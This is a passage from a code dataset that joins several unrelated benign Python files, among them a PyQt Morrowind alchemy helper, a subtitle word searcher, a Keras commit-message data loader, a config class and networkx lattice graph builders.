findwhatyouneed(writefile(\"https://douban-api.uieee.com/v2/movie/subject/\",i))\n except:\n continue","sub_path":"douban_API_csv.py","file_name":"douban_API_csv.py","file_ext":"py","file_size_in_byte":3237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"29160623","text":"\"\"\"\nRun the benchmark test cases using pytest-benchmark\n\"\"\"\nimport pytest\nfrom epics import PV\n\nimport typhos.benchmark.utils as utils\nfrom typhos.benchmark.cases import unit_tests\nfrom typhos.benchmark.profile import profiler_context\n\nfrom .conftest import save_image\n\n\n# Name the test cases using the keys, run using the values\n@pytest.mark.parametrize('unit_test_name', unit_tests.keys())\ndef test_benchmark(unit_test_name, qapp, qtbot, benchmark, monkeypatch):\n \"\"\"\n Run all registered benchmarks.\n\n These typically just open and close a particular typhos screen.\n \"\"\"\n # Crudely permenant patch here to get around cleanup bug\n PV.count = property(lambda self: 1)\n suite = benchmark(inner_benchmark, unit_tests[unit_test_name], qtbot)\n save_image(suite, 'test_benchmark_' + unit_test_name)\n\n\ndef inner_benchmark(unit_test, qtbot):\n suite, context = unit_test()\n with context:\n qtbot.add_widget(suite)\n qtbot.wait_active(suite)\n return suite\n\n\ndef test_profiler(capsys):\n \"\"\"Super basic test that hits most functions here\"\"\"\n with profiler_context(['typhos.benchmark.utils']):\n utils.get_native_functions(utils)\n output = capsys.readouterr()\n assert 'get_native_functions' in output.out\n","sub_path":"typhos/tests/test_benchmark.py","file_name":"test_benchmark.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"152635912","text":"import func\nimport sys\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import *\n\n__author__ = \"twsau-soft.co.uk\"\n\n# global functions\ndef toggleNegative():\n\tfunc.toggleIncludeNegative()\n\t# reload frames\n\ndef toggleBloodmoon():\n\tfunc.toggleIncludeBloodmoon()\n\t# reload frames\n\ndef toggleTribunal():\n\tfunc.toggleIncludeTribunal()\n\t# reload frames\n\ndef selectEffect(item):\n\tif type(item) != str:\n\t\titem = item.text()\n\tselectedEffectTitle.setText(item)\n\trecipeList.load(item);\n\tloadEffectIcon(item)\n\tloadEffectInfo(item)\n\ndef loadEffectIcon(selectedEffect):\n\tfor effect in func.loadEffects():\n\t\tif effect[\"name\"] == selectedEffect:\n\t\t\tpixmap = QPixmap(effect[\"filename\"])\n\t\t\teffectIcon.setPixmap(pixmap)\n\ndef loadEffectInfo(selectedEffect):\n\tfor effect in func.loadEffects():\n\t\tif effect[\"name\"] == selectedEffect:\n\t\t\teffectInfo.setText(effect[\"info\"])\n\ndef selectIngredients(item):\n\tif type(item) != str:\n\t\titem = item.text()\n\n\nclass Window(QMainWindow):\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\tself.setFixedSize(600, 396)\n\t\tself.setWindowTitle(\"Asliel | Morrowind Alchemy Helper | twsau.co.uk\")\n\t\tself.setWindowIcon(QIcon(\"./icons/effects/Blind.jpg\"))\n\t\tself.setStyleSheet(open(\"./qss/style.qss\", \"r\").read())\n\n\t\t# menu actions\n\t\tquitAction = QAction(\"&Quit\", self)\n\t\tquitAction.triggered.connect(sys.exit)\n\t\ttoggleNegativeAction = QAction(\"&Negative Effects\", self, checkable=True)\n\t\ttoggleNegativeAction.triggered.connect(toggleNegative)\n\t\ttoggleBloodmoonAction = QAction(\"&Bloodmoon\", self, checkable=True, checked=True)\n\t\ttoggleBloodmoonAction.triggered.connect(toggleBloodmoon)\n\t\ttoggleTribunalAction = QAction(\"&Tribunal\", self, checkable=True, checked=True)\n\t\ttoggleTribunalAction.triggered.connect(toggleTribunal)\n\n\t\t# main menu\n\t\tmainMenu = self.menuBar()\n\t\tfileMenu = mainMenu.addMenu(\"&File\")\n\t\tfileMenu.addAction(quitAction)\n\t\toptionsMenu = mainMenu.addMenu(\"&Options\")\n\t\toptionsMenu.addAction(toggleNegativeAction)\n\t\toptionsMenu.addAction(toggleBloodmoonAction)\n\t\toptionsMenu.addAction(toggleTribunalAction)\n\n\nclass Frame(QFrame):\n\tdef __init__(self, parent, x, y):\n\t\tsuper().__init__(parent)\n\t\tself.resize(x, y)\n\nclass EffectList(QListWidget):\n\tdef __init__(self, parent, x, y):\n\t\tsuper(EffectList, self).__init__(parent)\n\t\tself.resize(x, y)\n\t\tself.load()\n\n\tdef load(self):\n\t\tself.clear()\n\t\tfor effect in func.loadEffects():\n\t\t\tself.addItem(effect[\"name\"])\n\t\tself.setCurrentRow(0)\n\n\nclass RecipeList(QListWidget):\n\tdef __init__(self, parent, x, y):\n\t\tsuper(RecipeList, self).__init__(parent)\n\t\tself.resize(x, y)\n\n\tdef load(self, item):\n\t\tself.clear()\n\t\ttry:\n\t\t\ti = 0\n\t\t\tfor recipe in func.getRecipes(item):\n\t\t\t\titem = QListWidgetItem(\"{a}, {b}\". format(a=recipe[0][\"name\"], b=recipe[1][\"name\"]))\n\t\t\t\titem.setTextAlignment(Qt.AlignHCenter)\n\t\t\t\tself.addItem(item)\n\t\t\t\ti += 1\n\t\texcept AttributeError:\n\t\t\tpass\n\t\t# set recipeListTitle\n\t\trecipeListTitle.setText(\"Recipes found: {i}\".format(i=i))\n\n\nif __name__ == \"__main__\":\n\tapp = QApplication(sys.argv)\n\tw = Window()\n\n\tframeA = Frame(w, 229, 371)\n\tframeA.move(0, 25)\n\n\tframeB = Frame(w, 371, 142)\n\tframeB.move(229, 25)\n\n\tframeC = Frame(w, 371, 229)\n\tframeC.move(229, 167)\n\n\t#frameD = Frame(w, 600, 229)\n\t#frameD.move(0, 396)\n\n\t# effect list\n\n\teffectListTitle = QLabel(frameA)\n\teffectListTitle.resize(229, 25)\n\teffectListTitle.setText(\"Effect List\")\n\teffectListTitle.setAlignment(Qt.AlignCenter)\n\n\teffectList = EffectList(frameA, 229, 346)\n\teffectList.move(0, 25)\n\n\t# selected effect info\n\n\tselectedEffectTitle = QLabel(frameB)\n\tselectedEffectTitle.resize(371, 25)\n\tselectedEffectTitle.setAlignment(Qt.AlignCenter)\n\n\teffectInfo = QLabel(frameB)\n\teffectInfo.resize(321, 110)\n\teffectInfo.move(40, 25)\n\teffectInfo.setWordWrap(True)\n\teffectInfo.setAlignment(Qt.AlignCenter)\n\teffectInfo.setObjectName(\"info\")\n\n\teffectIcon = QLabel(frameB)\n\teffectIcon.resize(32, 32)\n\teffectIcon.move(10, 33)\n\n\t# recipe list\n\n\t#recipeListFrame = Frame(nwFrame, 386, 236)\n\t#recipeListFrame.move(236, 146)\n\n\trecipeListTitle = QLabel(frameC)\n\trecipeListTitle.resize(371, 25)\n\trecipeListTitle.setText(\"Recipe List\")\n\trecipeListTitle.setAlignment(Qt.AlignCenter)\n\n\trecipeList = RecipeList(frameC, 371, 204)\n\trecipeList.move(0, 25)\n\n\t# set default selected effect\n\tselectEffect(\"Cure Blight Disease\")\n\n\t# event handler\n\teffectList.currentItemChanged.connect(selectEffect)\n\trecipeList.currentItemChanged.connect(selectIngredients)\n\n\n\tw.show()\n\tsys.exit(app.exec_())","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"161035579","text":"import codecs\nimport re\n\n'''\nThis class is used to find lines and it's time from srt file\nWorldSearcher class require two parameters, \n'file' represents the directory as string, \n'world' represents the target world as string.\n\n\nThe 'results' function will return a array include all temples with time and sentence.\ne.g:\n[('00:41:56,540 --> 00:42:00,540\\r\\n', '龙母非常美丽\\r\\n'), ('00:51:16,870 --> 00:51:19,250\\r\\n', '找一座恬静 美丽的小岛\\r\\n')]\n\n\nThe total attribute is the total of results.\n'''\nclass WordSearcher():\n def __init__(self, file, word):\n self.target_word = word.lower()\n self.target_file = file\n self.time_scale = []\n self.if_illeage()\n self.total = self.time_scale.__len__()\n if self.total != 0:\n #the first time,just for test\n self.time_start = self.start_time()\n self.time_end = self.end_time()\n else:\n self.time_end = 0\n self.time_start = 0\n\n def if_illeage(self):\n if self.target_word.find('-->') == -1:\n self.search_word()\n\n def search_word(self):\n file = codecs.open(self.target_file, 'r', 'gb18030')\n judge1 = True\n judge2 = True\n while judge2:\n if judge1 == True:\n pos_time = file.readline()\n else:\n pos_time = pos_line\n while pos_time.find('-->') != -1:\n pos_line = file.readline()\n pos_line = pos_line.lower()\n pattern = '[^a-z]' + self.target_word + '[^a-z]'\n if re.search(pattern=pattern, string=pos_line):\n self.time_scale.append((pos_time, ' ' + pos_line + ' '))\n\n elif pos_line.find('-->') != -1:\n judge1 = False\n break\n elif not len(pos_line):\n judge2 = False\n break\n file.close()\n def results(self):\n return self.time_scale\n\n\n def start_time(self):\n h = int(self.time_scale[0][0][0:2]) * 3600\n m = int(self.time_scale[0][0][3:5]) * 60\n s = h + m + int(self.time_scale[0][0][6:8]) - 5\n return s * 1000\n\n def end_time(self):\n h = int(self.time_scale[0][0][17:19]) * 3600\n m = int(self.time_scale[0][0][20:22]) * 60\n s = h + m + int(self.time_scale[0][0][23:25]) + 5\n return s * 1000\n\n\n#Beneath part is for testing\nif __name__ == '__main__':\n srt1 = WordSearcher('srtSource/v1.srt', 'queen')\n print(srt1.results(), srt1.total)\n print(srt1.time_start)\n print(srt1.time_end)\n","sub_path":"MyWord.py","file_name":"MyWord.py","file_ext":"py","file_size_in_byte":2617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"593437404","text":"from . import FixtureTest\n\n\nclass MultilineEncoded(FixtureTest):\n def test_multiline_encoded(self):\n # Way: Big Bear Boulevard (325846175)\n self.load_fixtures(['http://www.openstreetmap.org/way/325846175'])\n\n self.assert_feature_geom_type(16, 11473, 26126, 'roads',\n 325846175, 'LineString')\n","sub_path":"integration-test/768-multiline-encoded.py","file_name":"768-multiline-encoded.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"367054044","text":"## Host dummy functions for developemt only\nimport time\nimport random\nimport datetime\nfrom plotly import graph_objs as go\n\nimport streamlit as st\n\n@st.cache(show_spinner=False)\ndef get_data(mrn):\n time.sleep(1)\n dummy_current = 0\n dummy_data = [dummy_current]\n for _ in range(23):\n dummy_current += random.randint(3, 14)*1000\n dummy_data.append(dummy_current)\n return dummy_data\n\n@st.cache(show_spinner=False)\ndef run_inference(patient_data):\n time.sleep(3)\n _base = patient_data[\"meta\"][-1]\n def cumulative(base, array):\n new_array=[] \n j=0\n for i in range(0,len(array)):\n j+=array[i]\n new_array.append(base+j)\n return new_array\n \n return {k:cumulative(_base, [random.randint(30, 90)*1000 for _ in range(6)]) for k in patient_data[\"pathways\"]}\n\n@st.cache(show_spinner=False)\ndef get_predictions_plot(patient_data, preditions):\n x_size = len(patient_data[\"meta\"])\n today = datetime.datetime.today()\n x_dates = list([datetime.timedelta(days=x*30)+today for x in range(1,7)])\n x_dates = [x.date() for x in x_dates]\n date_3m_later = today+datetime.timedelta(days=30)\n\n fig = go.Figure()\n fig.add_traces([\n go.Scatter(\n x = x_dates,\n y = preditions[k],\n mode=\"lines\",\n name = k,\n text = [k]*len(x_dates),\n hovertemplate =\n '
Pathway: %{text}
'+\n 'Date: %{x}
'+\n 'Margin: %{y}'+\n '',\n ) \n for k in sorted(preditions.keys())\n ])\n fig.layout.xaxis.title= \"Date\"\n fig.layout.yaxis.title= \"Cumulative Pharmacy Margin\"\n fig.layout.plot_bgcolor='rgba(0,0,0,0)'\n\n fig.update_yaxes(\n tickprefix=\"$\",rangemode=\"nonnegative\", \n linecolor=\"black\",tickcolor=\"black\", ticks='inside',)\n \n fig.update_layout(\n xaxis = dict(\n range = [x_dates[0]-datetime.timedelta(days=14), x_dates[-1] + datetime.timedelta(days=14)], \n linecolor = \"black\", tickcolor=\"black\", ticks='inside',\n )\n )\n return fig","sub_path":"infer_dummy.py","file_name":"infer_dummy.py","file_ext":"py","file_size_in_byte":2154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"416480433","text":"'''\nTag selector\n\nID : #name\nCLASS : .name\nTAS : name\nDESCENDENT : name li \nCHILD : name > li\n'''\n\nfrom bs4 import BeautifulSoup as bs\n\nhtml = \"\"\"\n\n \n
\n

위키북스 도서

\n
    \n
  • 유니티 게임 이펙트 입문
  • \n
  • 스위프트로 시작하는 아이폰 앱 개발 교과서
  • \n
  • 모던 웹사이트 디자인의 정석
  • \n
\n
\n \n\n\"\"\"\n\nsoup = bs(html, 'html.parser')\n\nselcet_one = soup.select_one('body > div > h1') # select a property\n\nselect = soup.select('ul.items li') # select perperties\n\nprint(selcet_one.string)\n\nprint(soup.select_one('ul').attrs)\n\nprint([li.string for li in select])","sub_path":"scraping/bs_practice.py","file_name":"bs_practice.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"600312667","text":"# -*- coding: utf-8 -*-\n\nfrom pathlib import Path\nimport random\nfrom typing import Tuple, Union, Iterable, List\n\nimport numpy as np\nfrom keras.preprocessing.sequence import pad_sequences\n\n\"\"\"\nUtils to load processed data into python data structures.\n\"\"\"\n\nDIFF_END = b'\\x01'\nMSG_BEGIN = b'\\x00'\nMSG_END = b'\\x01'\n\n__diff_end = np.fromstring(DIFF_END, np.uint8)[0]\n__msg_begin = np.fromstring(MSG_BEGIN, np.uint8)[0]\n__msg_end = np.fromstring(MSG_END, np.uint8)[0]\n\n\ndef one_hot_encode_diff(bytes_to_encode: bytes) -> np.ndarray:\n \"\"\"\n One-hot encode the given bytes into 2D float32 numpy array.\n\n Any bytes with values < 2 are sent to 2, and any values > 127\n are sent to 127. The value 1 is used as a special marker:\n\n 1 : end of commit diff\n\n See also: DIFF_END and MSG_END.\n\n Inputs\n ------\n bytes_to_encode : bytes\n The bytes to be one-hot encode.\n\n Returns\n -------\n y : 2D float32 numpy array of one-hot encoded values\n \"\"\"\n x = np.fromstring(bytes_to_encode + DIFF_END, np.uint8)\n x = np.clip(x, 2, 127)\n x[-1] = __diff_end\n y = np.zeros((x.size, 128), dtype=np.float32)\n y[np.arange(y.shape[0]), x] = 1.0\n return y\n\n\ndef one_hot_encode_msg(bytes_to_encode: bytes) -> np.ndarray:\n \"\"\"\n One-hot encode the given bytes into 2D float32 numpy array.\n\n Any bytes with values < 2 are sent to 2, and any values > 127\n are sent to 127. The values 0 and 1 are used as special markers:\n\n 0 : beginning of commit message\n 1 : end of commit message\n\n See also: DIFF_END and MSG_END.\n\n Inputs\n ------\n bytes_to_encode : bytes\n The bytes to be one-hot encode.\n\n Returns\n -------\n y : 2D float32 numpy array of one-hot encoded values\n \"\"\"\n x = np.fromstring(MSG_BEGIN + bytes_to_encode + MSG_END, np.uint8)\n x = np.clip(x, 2, 127)\n x[0] = __msg_begin\n x[-1] = __msg_end\n y = np.zeros((x.size, 128), dtype=np.float32)\n y[np.arange(y.shape[0]), x] = 1.0\n return y\n\n\ndef _read(filename: Union[str, Path], maxlen: int=-1):\n with open(filename, 'rb') as fp:\n return fp.read(maxlen)\n\n\ndef load(repo_path: Union[str, Path], cv_train_split: float, which: str,\n max_diff_len: int=-1, max_msg_len: int=-1\n ) -> Tuple[np.ndarray, np.ndarray]:\n \"\"\"\n Loads the processed data from\n `/data/processed-repos/` into\n two length-N lists `x,y` of 2D numpy arrays such that\n\n x[i] : JxL array encoding the commit diff\n y[i] : KxL array encoding the commit message\n\n The one-hot-encoding is done one character at a time,\n treating the text as ASCII text, and any bytes with\n values < 2 are sent to 2, and any values > 127 are sent\n to 127. The values 0 and 1 are used as special markers:\n\n 0 : beginning of message\n 1 : end of commit message/end of diff\n\n Data will be split into training/validation by sorting the\n commits SHAs and taking the first section as training and\n the second section as validation.\n\n WARNING :\n Since data is split by the commit SHAs, data leakage may\n occur. For example, a regular commit and a *merge* commit\n with the same diff/message may be in different splits.\n\n Inputs\n ------\n repo : str or Path-like\n A folder relative to `/data/processed-repos`\n cv_train_split : float\n A number between 0 and 1 inclusive, the amount of data\n used for training vs. validation. The number of commits\n multiplied by this number and truncated will be used for\n training and the rest for validation.\n which : str\n One of 'train' or 'val' indicating whether the training\n data or the validation data should be returned respectively.\n max_diff_len : int\n Maximum number of bytes to read from the diff file.\n If negative, the whole file is read. Note that an extra\n byte is added to diffs, so the maximum length of x-data\n returned will be `max_diff_len + 1`.\n max_msg_len : int\n Maximum number of bytes to read from the message file.\n If negative, the whole file is read. Note that an extra\n two bytes are added to messages, so the maximum length of\n y-data returned will be `max_msg_len + 2`.\n\n Returns\n -------\n (x,y) tuples of lists of 2D numpy arrays.\n\n See also\n --------\n `one_hot_encode_diff`\n `one_hot_encode_msg`\n \"\"\"\n repo_path = Path(__file__).parents[2] / 'data/processed-repos' / repo_path\n commits = sorted(set([f.parent / f.stem for f in repo_path.glob('*')]))\n\n x = [one_hot_encode_diff(_read(c.with_suffix('.diff'), max_diff_len))\n for c in commits]\n y = [one_hot_encode_msg(_read(c.with_suffix('.msg'), max_msg_len))\n for c in commits]\n\n split = int(len(commits) * cv_train_split)\n\n if which == 'train':\n return x[:split], y[:split]\n if which == 'val':\n return x[split:], y[split:]\n raise ValueError('`which` must be one of [\"train\", \"val\"]')\n\n\ndef load_train_generator(repo_path: Union[str, Path], cv_train_split: float,\n max_diff_len: int=-1, max_msg_len: int=-1\n ) -> Iterable[Tuple[np.ndarray, np.ndarray]]:\n \"\"\"\n A generator giving access to the data located in\n `/data/processed-repos/`.\n Will continue to return samples x,y with\n\n x : JxL array encoding the commit diff\n y : KxL array encoding the commit message\n\n The one-hot-encoding is done one character at a time,\n treating the text as ASCII text, and any bytes with\n values < 2 are sent to 2, and any values > 127 are sent\n to 127. The values 0 and 1 are used as special markers:\n\n 0 : end of commit diff\n 1 : end of commit message\n\n The generator will only yield the training portion of the data.\n\n Inputs\n ------\n repo : str or Path-like\n A folder relative to `/data/processed-repos`\n cv_train_split : float\n A number between 0 and 1 inclusive, the amount of data\n used for training vs. validation. The number of commits\n multiplied by this number and truncated will be used for\n training and the rest for validation.\n max_diff_len : int\n Maximum number of bytes to read from the diff file.\n If negative, the whole file is read.\n max_msg_len : int\n Maximum number of bytes to read from the message file.\n If negative, the whole file is read.\n\n WARNING :\n Since data is split by the commit SHAs, data leakage may\n occur. For example, a regular commit and a *merge* commit\n with the same diff/message may be in different splits.\n\n Returns\n -------\n generator repeatedly yielding\n x,y : Two 2D numpy arrays.\n \"\"\"\n repo_path = Path(__file__).parents[2] / 'data/processed-repos' / repo_path\n commits = sorted(set(f.parent / f.stem for f in repo_path.glob('*')))\n\n split = int(len(commits) * cv_train_split)\n commits = commits[:split]\n while True:\n c = random.choice(commits)\n x = one_hot_encode_diff(_read(c.with_suffix('.diff'), max_diff_len))\n y = one_hot_encode_msg(_read(c.with_suffix('.msg'), max_msg_len))\n yield x, y\n\n\ndef format_batch(batch: List[Tuple[np.ndarray, np.ndarray]],\n max_diff_len: int,\n max_msg_len: int\n ) -> Tuple[List[np.ndarray], np.ndarray]:\n \"\"\"\n Format a batch by padding sequences with 0s up to the maximum lengths\n given. Also slices the message `y` into `y0` and `y1` similarly to\n y0, y1 = y[:-1], y[1:]\n since the model needs to learn to predict the next element `y1[i]`\n from the current element `y0[i]`.\n\n Returns values in the format expected by keras for the trainer\n model, i.e. `([x, y0], y1)`, since `x` and `y0` are inputs and `y1`\n is an output.\n\n Inputs\n ------\n batch : List\n Each element of batch is a tuple of (x,y) data where x is the\n encoded diff and y is the encoded commit message.\n max_diff_len : int\n The encoded diffs will be padded to at most this length by\n adding 0s to the *front* of the sequence. Any encodings\n greater than this length are truncated by removing from\n the *front*. This ensures the end of the diff will still\n be indicated by the special DIFF_END value.\n max_msg_len : int\n The encoded messages will be padded to at most this length by\n adding 0s to the *end* of the sequence. Any encodings\n greater than this length are truncated by removing from\n the *end*. This ensures that the beginning of the message\n is still indicated by the special MSG_BEGIN value.\n\n Returns\n -------\n ([x,y0], y1)\n x is the 3D padded diff encodings\n y0 is the 3D padded message encodings, except the last element\n y1 is the 3D padded message encodings, except the first element\n \"\"\"\n xs = [d[0] for d in batch]\n xs = pad_sequences(xs,\n maxlen=max_diff_len,\n dtype='float32',\n padding='pre',\n truncating='pre',\n value=0.0)\n\n ys = [d[1] for d in batch]\n ys = pad_sequences(ys,\n maxlen=max_msg_len,\n dtype='float32',\n padding='post',\n truncating='post',\n value=0.0)\n\n return [xs, ys[:, :-1, :]], ys[:, 1:, :] # type: ignore # mypy hates slice\n","sub_path":"dashm/data/load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":9611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"218904103","text":"\"\"\"Config data\n\n\"\"\"\n\nimport configparser\nimport logging\nimport os\nimport site\n\nfrom squid_py.constants import (\n KEEPER_CONTRACTS\n)\n\nDEFAULT_KEEPER_HOST = 'localhost'\nDEFAULT_KEEPER_PORT = 8545\nDEFAULT_KEEPER_URL = 'http://localhost:8545'\nDEFAULT_KEEPER_PATH = 'contracts'\nDEFAULT_GAS_LIMIT = 300000\nDEFAULT_NAME_PROVIDER_URL = 'http://localhost:5000'\n\nNAME_KEEPER_URL = 'keeper.url'\nNAME_KEEPER_PATH = 'keeper.path'\nNAME_GAS_LIMIT = 'gas_limit'\nNAME_PROVIDER_URL = 'provider.url'\nNAME_MARKET_ADDRESS = 'market.address'\nNAME_AUTH_ADDRESS = 'auth.address'\nNAME_TOKEN_ADDRESS = 'token.address'\n\nenviron_names = {\n NAME_KEEPER_URL: ['KEEPER_URL', 'Keeper URL'],\n NAME_KEEPER_PATH: ['KEEPER_PATH', 'Path to the keeper contracts'],\n NAME_GAS_LIMIT: ['GAS_LIMIT', 'Gas limit'],\n NAME_PROVIDER_URL: ['PROVIDER_URL', 'Provider URL'],\n NAME_MARKET_ADDRESS: ['MARKET_ADDRESS', 'Market address'],\n NAME_AUTH_ADDRESS: ['AUTH_ADDRESS', 'Auth address'],\n NAME_TOKEN_ADDRESS: ['TOKEN_ADDRESS', 'Token address'],\n}\n\nconfig_defaults = {\n KEEPER_CONTRACTS: {\n NAME_KEEPER_URL: DEFAULT_KEEPER_URL,\n NAME_KEEPER_PATH: DEFAULT_KEEPER_PATH,\n NAME_GAS_LIMIT: DEFAULT_GAS_LIMIT,\n NAME_PROVIDER_URL: DEFAULT_NAME_PROVIDER_URL,\n NAME_MARKET_ADDRESS: '',\n NAME_AUTH_ADDRESS: '',\n NAME_TOKEN_ADDRESS: '',\n }\n}\n\n\nclass Config(configparser.ConfigParser):\n\n def __init__(self, filename=None, **kwargs):\n configparser.ConfigParser.__init__(self)\n\n self.read_dict(config_defaults)\n self._section_name = KEEPER_CONTRACTS\n self._logger = kwargs.get('logger', logging.getLogger(__name__))\n self._logger.debug('Config: loading config file %s', filename)\n\n if filename:\n with open(filename) as fp:\n text = fp.read()\n self.read_string(text)\n else:\n if 'text' in kwargs:\n self.read_string(kwargs['text'])\n self._load_environ()\n\n def _load_environ(self):\n for option_name, environ_item in environ_names.items():\n value = os.environ.get(environ_item[0])\n if value is not None:\n self._logger.debug('Config: setting environ %s = %s', option_name, value)\n self.set(self._section_name, option_name, value)\n\n def set_arguments(self, items):\n for name, value in items.items():\n if value is not None:\n self._logger.debug('Config: setting argument %s = %s', name, value)\n self.set(self._section_name, name, value)\n\n @property\n def keeper_path(self):\n path = self.get(self._section_name, NAME_KEEPER_PATH)\n if os.path.exists(path):\n pass\n elif os.getenv('VIRTUAL_ENV'):\n path = os.path.join(os.getenv('VIRTUAL_ENV'), 'contracts')\n else:\n path = os.path.join(site.PREFIXES[0], 'contracts')\n return path\n\n # properties\n\n @property\n def keeper_url(self):\n return self.get(self._section_name, NAME_KEEPER_URL)\n\n @property\n def gas_limit(self):\n return int(self.get(self._section_name, NAME_GAS_LIMIT))\n\n @property\n def provider_url(self):\n return self.get(self._section_name, NAME_PROVIDER_URL)\n\n @property\n def address_list(self):\n return {\n 'market': self.get(self._section_name, NAME_MARKET_ADDRESS),\n 'auth': self.get(self._section_name, NAME_AUTH_ADDRESS),\n 'token': self.get(self._section_name, NAME_TOKEN_ADDRESS),\n }\n\n # static methods\n\n @staticmethod\n def get_environ_help():\n result = []\n for option_name, environ_item in environ_names.items():\n # codacy fix\n assert option_name\n result.append(\"{:20}{:40}\".format(environ_item[0], environ_item[1]))\n return \"\\n\".join(result)\n","sub_path":"squid_py/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"186574326","text":"import networkx as nx\nimport operator\nimport json\nfrom networkx.readwrite import json_graph\nfrom collections import OrderedDict\nfrom math import radians, cos, sin, asin, sqrt\n\n# 3x3 lattice\n\ndef create_3x3_lattice():\n \n G = nx.DiGraph()\n \n nodes = [0,1,2,3,4,5,6,7,8]\n labels = {}\n for node in nodes:\n labels[node] = r'$' + str(node) + r'$'\n G.add_nodes_from(nodes)\n pos = ([\n (0,10),\n (5,10),\n (10,10),\n (0,5),\n (5,5),\n (10,5),\n (0,0),\n (5,0),\n (10,0)\n ])\n \n # randomly generated, should have solution\n edges = [\n (0, 1, {'time': 9.33, 'capacity': 18.31}),\n (0, 3, {'time': 8.84, 'capacity': 8.31}),\n (1, 0, {'time': 9.33, 'capacity': 18.31}),\n (1, 2, {'time': 0.87, 'capacity': 16.48}),\n (1, 4, {'time': 4.95, 'capacity': 12.64}),\n (2, 1, {'time': 0.87, 'capacity': 16.48}),\n (2, 5, {'time': 8.15, 'capacity': 8.08}),\n (3, 0, {'time': 8.84, 'capacity': 8.31}),\n (3, 4, {'time': 3.83, 'capacity': 19.45}),\n (3, 6, {'time': 5.96, 'capacity': 2.69}),\n (4, 1, {'time': 4.95, 'capacity': 12.64}),\n (4, 3, {'time': 3.83, 'capacity': 19.45}),\n (4, 5, {'time': 7.72, 'capacity': 3.38}),\n (4, 7, {'time': 3.08, 'capacity': 19.23}),\n (5, 8, {'time': 1.96, 'capacity': 13.80}),\n (5, 2, {'time': 8.15, 'capacity': 8.08}),\n (5, 4, {'time': 7.72, 'capacity': 3.38}),\n (6, 3, {'time': 5.96, 'capacity': 2.69}),\n (6, 7, {'time': 7.74, 'capacity': 14.54}),\n (7, 8, {'time': 4.18, 'capacity': 1.03}),\n (7, 4, {'time': 3.08, 'capacity': 19.23}),\n (7, 6, {'time': 7.74, 'capacity': 14.54}),\n (8, 5, {'time': 1.96, 'capacity': 13.80}),\n (8, 7, {'time': 4.18, 'capacity': 1.03}),\n ]\n\n G.add_edges_from(edges)\n\n demands =[(0, 1, 1.12),\n (0, 2, 0.18),\n (0, 3, 0.78),\n (0, 4, 0.15),\n (0, 5, 1.05),\n (0, 6, 0.91),\n (0, 7, 0.08),\n (0, 8, 0.99),\n (1, 0, 0.81),\n (1, 2, 0.60),\n (1, 3, 0.12),\n (1, 4, 0.65),\n (1, 5, 0.71),\n (1, 6, 0.39),\n (1, 7, 1.11),\n (1, 8, 1.01),\n (2, 0, 0.47),\n (2, 1, 0.21),\n (2, 3, 0.41),\n (2, 4, 0.12),\n (2, 5, 0.66),\n (2, 6, 0.46),\n (2, 7, 0.75),\n (2, 8, 0.65),\n (3, 0, 0.12),\n (3, 1, 1.15),\n (3, 2, 1.01),\n (3, 4, 0.70),\n (3, 5, 0.32),\n (3, 6, 0.40),\n (3, 7, 0.87),\n (3, 8, 0.19),\n (4, 0, 0.00),\n (4, 1, 0.01),\n (4, 2, 0.09),\n (4, 3, 0.41),\n (4, 5, 0.18),\n (4, 6, 0.95),\n (4, 7, 0.83),\n (4, 8, 0.80),\n (5, 0, 0.94),\n (5, 1, 0.10),\n (5, 2, 0.32),\n (5, 3, 0.15),\n (5, 4, 0.10),\n (5, 6, 0.24),\n (5, 7, 0.54),\n (5, 8, 1.03),\n (6, 0, 0.27),\n (6, 1, 0.53),\n (6, 2, 1.05),\n (6, 3, 1.10),\n (6, 4, 0.38),\n (6, 5, 0.82),\n (6, 7, 0.03),\n (6, 8, 0.38),\n (7, 0, 0.08),\n (7, 1, 0.30),\n (7, 2, 1.15),\n (7, 3, 0.54),\n (7, 4, 0.90),\n (7, 5, 0.69),\n (7, 6, 0.45),\n (7, 8, 0.99),\n (8, 0, 0.94),\n (8, 1, 0.41),\n (8, 2, 0.84),\n (8, 3, 0.24),\n (8, 4, 0.90),\n (8, 5, 0.26),\n (8, 6, 0.33),\n (8, 7, 0.60),\n ]\n\n return G, pos, demands\n\ndef create_2x2_lattice():\n\n G = nx.DiGraph()\n nodes = [0,1,2,3]\n labels = {}\n for node in nodes:\n labels[node] = r'$' + str(node) + r'$'\n G.add_nodes_from(nodes)\n pos = ([\n (0,0),\n (0,5),\n (5,5),\n (5,0),\n ])\n edges = [\n (0, 1, {'time': 9.33, 'capacity': 18}),\n (0, 3, {'time': 8.84, 'capacity': 8}),\n (1, 0, {'time': 9.33, 'capacity': 18}),\n (1, 2, {'time': 4.95, 'capacity': 12}),\n (3, 0, {'time': 8.84, 'capacity': 8}),\n (3, 2, {'time': 3.83, 'capacity': 19}),\n (2, 1, {'time': 4.95, 'capacity': 12}),\n (2, 3, {'time': 3.83, 'capacity': 19}),\n ]\n\n G.add_edges_from(edges)\n\n demands =[\n (0, 1, 0.12),\n (0, 2, 0.58),\n (0, 3, 0.38),\n (1, 0, 0.21),\n (1, 2, 1.10),\n (1, 3, 0.42),\n (2, 0, 0.47),\n (2, 1, 0.21),\n (2, 3, 0.41),\n (3, 0, 